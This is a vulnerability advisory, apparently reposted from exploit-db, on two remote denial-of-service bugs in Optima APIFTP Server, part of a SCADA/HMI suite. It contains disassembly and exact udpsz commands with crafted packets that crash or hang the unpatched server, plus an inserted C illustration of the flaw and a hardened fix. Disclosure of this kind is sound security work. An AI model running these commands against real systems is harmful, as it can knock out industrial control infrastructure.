optima apiftp server 1.5.2.13 – Multiple Vulnerabilities

Author: Luigi Auriemma
Date: 2011-11-14
Source: https://www.exploit-db.com/exploits/18112/

    #######################################################################
    
     Luigi Auriemma
    
    Application:  Optima APIFTP Server
                  http://www.optimalog.com/home.html
    Versions:     <= 1.5.2.13
    Platforms:    Windows
    Bugs:         A] NULL pointer
                  B] endless loop
    Exploitation: remote
    Date:         13 Nov 2011
    Author:       Luigi Auriemma
    e-mail:       aluigi@autistici.org
    web:          aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    Optima is a suite of automation software for controlling PLCs via a
    SCADA/HMI interface.
    APIFTP Server is a file server for working with remote files located on
    shared folders.
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    ---------------
    A] NULL pointer
    ---------------
    
    A NULL pointer dereference reachable through overlong path names.
    The effect is a MessageBox displaying the error, after which execution
    continues and, within a few seconds, exhausts the stack and terminates
    the server.
    
    
    ---------------
    B] endless loop
    ---------------
    
    Endless loop with CPU at 100% caused by incomplete packets:
    
    004A9C93 8B03 /MOV EAX,DWORD PTR DS:[EBX]
    004A9C95 8B80 78010000|MOV EAX,DWORD PTR DS:[EAX+178]
    004A9C9B 2D B80B0000|SUB EAX,0BB8 ; Switch (cases BB8..BE0)
    004A9CA0 74 19|JE SHORT APIFTPSe.004A9CBB
    004A9CA2 83E8 14|SUB EAX,14
    004A9CA5 74 47|JE SHORT APIFTPSe.004A9CEE
    004A9CA7 83E8 0A|SUB EAX,0A
    004A9CAA 0F84 9D000000|JE APIFTPSe.004A9D4D
    004A9CB0 83E8 0A|SUB EAX,0A
    004A9CB3 0F84 CA000000|JE APIFTPSe.004A9D83
    004A9CB9^EB D8|JMP SHORT APIFTPSe.004A9C93
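    As an added illustration (not code from the advisory, the vendor or the tool above), the shape of that loop modelled in C: the four case values are the ones the disassembly tests (0xBB8, then 0xBCC, 0xBD6 and 0xBE0 after the successive subtractions), while the `conn` struct, the `ST_PENDING` value and the iteration budget are assumptions made here so the model terminates. The hardened variant shows the defensive change: an unknown state is rejected instead of retried, and the wait for a state change is bounded.

```c
#include <stdbool.h>
#include <stdint.h>

/* Case values the disassembly tests: EAX-0xBB8, then -0x14, -0xA, -0xA. */
enum { ST_A = 0xBB8, ST_B = 0xBCC, ST_C = 0xBD6, ST_D = 0xBE0 };

/* Assumed (constructed): 0 stands for "request not yet fully received". */
#define ST_PENDING 0

/* Hypothetical stand-in for the object whose DWORD at +0x178 is re-read
 * on every pass of the loop. */
struct conn { uint32_t state; };

enum outcome { DISPATCHED, BAD_STATE, TIMED_OUT };

/* Vulnerable shape: no default case and an unconditional JMP back to the
 * top. If a truncated packet leaves 'state' outside the four known values,
 * the thread spins at 100% CPU. max_iters exists only so this model
 * returns; the real loop has no such exit. */
bool dispatch_vulnerable(struct conn *c, unsigned max_iters) {
    for (;;) {
        switch (c->state) {
        case ST_A: case ST_B: case ST_C: case ST_D:
            return true;            /* the matching handler would run here */
        }
        if (--max_iters == 0)
            return false;           /* never reached in the original */
    }
}

/* Hardened shape: an unknown state is a protocol error, not a reason to
 * retry, and waiting for a pending request is bounded by a budget
 * (in real code: a deadline or a blocking wait on the receiver). */
enum outcome dispatch_hardened(struct conn *c, unsigned budget) {
    while (budget-- > 0) {
        switch (c->state) {
        case ST_A: case ST_B: case ST_C: case ST_D:
            return DISPATCHED;
        case ST_PENDING:
            continue;               /* real code: yield / wait on an event */
        default:
            return BAD_STATE;       /* drop the connection, log the request */
        }
    }
    return TIMED_OUT;               /* release the connection, do not spin */
}
```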
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
    
    A]
    udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107
    
    Wait some seconds; the tool will quit automatically.
    
    B]
    udpsz -C "e803 0400 00" -T -D SERVER 10260 -1
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################